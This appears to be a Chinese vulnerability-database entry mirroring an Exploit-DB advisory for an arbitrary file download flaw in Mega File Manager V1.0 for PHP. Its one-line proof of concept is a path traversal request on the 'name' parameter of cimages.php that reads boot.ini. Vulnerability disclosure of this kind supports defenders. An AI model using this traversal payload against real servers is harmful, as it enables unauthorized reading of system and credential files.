Mega File Manager - File Download

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1063640 漏洞类型
发布时间 2012-04-22 更新时间 2012-04-22
CVE编号 N/A CNNVD-ID N/A
漏洞平台 PHP CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/18768
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
# Exploit Title: [MegaFileManager FileDownload Vulnerability

# date: 2012-04-19

# Author: i2sec-Min Gi Jo

# Software Link: http://www.awesomephp.com/?Download*5

# Version: Mega File Manager V 1.0

# Tested on: Windows




# Description : There is no filtering on 'cimages.php' parameter 'name'.


# PoC : http://[server]/megafilemanager/cimages.php?name=../../../../boot.ini